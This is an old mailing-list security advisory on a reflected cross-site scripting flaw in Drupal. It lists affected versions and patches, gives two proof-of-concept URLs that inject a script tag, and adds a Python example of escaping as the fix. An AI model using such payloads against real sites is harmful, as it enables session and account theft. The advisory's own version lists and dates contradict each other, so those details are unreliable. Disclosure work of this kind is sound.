Drupal XSS Vulnerability (main page and sub pages)

From: Ferruh Mavituna (ferruhat_private)
Date: Sun Jul 20 2003 - 22:26:30 PDT


    ------------------------------------------------------
    Drupal XSS Vulnerability (main page and sub pages)
    ------------------------------------------------------
    Any kind of XSS attack is possible. An attacker could access other
    users' or the admin's Drupal accounts.
    
    ------------------------------------------------------
    About Drupal;
    ------------------------------------------------------
    www.drupal.com
    Drupal is an open-source platform and content management system for building
    dynamic web sites offering a broad range of features and services including
    user administration, publishing workflow, discussion capabilities, news
    aggregation, metadata functionalities using controlled vocabularies and XML
    publishing for content sharing purposes. Equipped with a powerful blend of
    features and configurability, Drupal can support a diverse range of web
    projects ranging from personal weblogs to large community-driven sites.
    
    ------------------------------------------------------
    Vulnerable;
    ------------------------------------------------------
    TESTED;
     Drupal 4.2.0 RC
    
    NOT TESTED - 90% VULNERABLE;
     Drupal 4.1.0
     Drupal 4.0.0
     Drupal 3.0.2
     Drupal 3.0.1
     Drupal 3.0.0
     Drupal 2.0.0
     Drupal 1.0.0
    
    ------------------------------------------------------
    Not Vulnerable;
    ------------------------------------------------------
    Drupal 4.2.0 RC
    
    ------------------------------------------------------
    Vendor Status;
    ------------------------------------------------------
    Vendor replied and fixed quickly.
    
    ------------------------------------------------------
    Solution & Patches;
    ------------------------------------------------------
    xss-cvs.patch
    xss-4.2.0-rc.patch
    xss-4.1.0.patch
    
    Download Patch Files:
    http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip
    Better yet, download the new version from www.drupal.org
    
    [All files provided by Vendor]
    
    ------------------------------------------------------
    Exploit Code;
    ------------------------------------------------------
    http://[victim]/xxx"][script]alert(document.domain)]/script]["
    
    ------------------------------------------------------
    Exploit - 2;
    ------------------------------------------------------
    http://[victim]/node/view/666"><script>alert(document.domain)</script>
    
    Replace "[]","<>"
    
    ------------------------------------------------------
    History;
    ------------------------------------------------------
    30.05.2003 - Discovered
    03.05.2003 - Vendor Informed
    03.05.2003 - Fixed by Vendor
    
    
    Ferruh Mavituna
    Web Application Security Specialist
    http://ferruh.mavituna.com
    ferruhat_private
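
Both URLs in the advisory use `">` to close a double-quoted attribute before the script tag, which is what a page that echoes the request path unescaped would allow. The following is an added example, not code from the advisory or from Drupal: the `<a href>` template and all function names are hypothetical, and it uses Python's HTML parser to check that escaping keeps the payload inside the attribute.

```python
from html import escape
from html.parser import HTMLParser

# Path taken from the "Exploit - 2" URL in the advisory, plus a benign control.
PAYLOAD_PATH = '/node/view/666"><script>alert(document.domain)</script>'
BENIGN_PATH = '/node/view/666'


def render_unsafe(path):
    """Hypothetical template: request path echoed into an attribute as-is."""
    return '<a href="%s">permalink</a>' % path


def render_safe(path):
    """Same template with &, <, > and both quote characters HTML-escaped."""
    return '<a href="%s">permalink</a>' % escape(path, quote=True)


class TagCollector(HTMLParser):
    """Records each start tag and decoded href value the parser sees."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.hrefs.extend(value for name, value in attrs if name == "href")


def parse(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


def injects_script(markup):
    """True if the rendered markup contains a script element."""
    return "script" in parse(markup).tags


if __name__ == "__main__":
    for path in (BENIGN_PATH, PAYLOAD_PATH):
        print(path)
        print("  unsafe injects script:", injects_script(render_unsafe(path)))
        print("  safe injects script:  ", injects_script(render_safe(path)))
```

In PHP, the language Drupal is written in, `htmlspecialchars($path, ENT_QUOTES)` performs the equivalent escaping.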
    


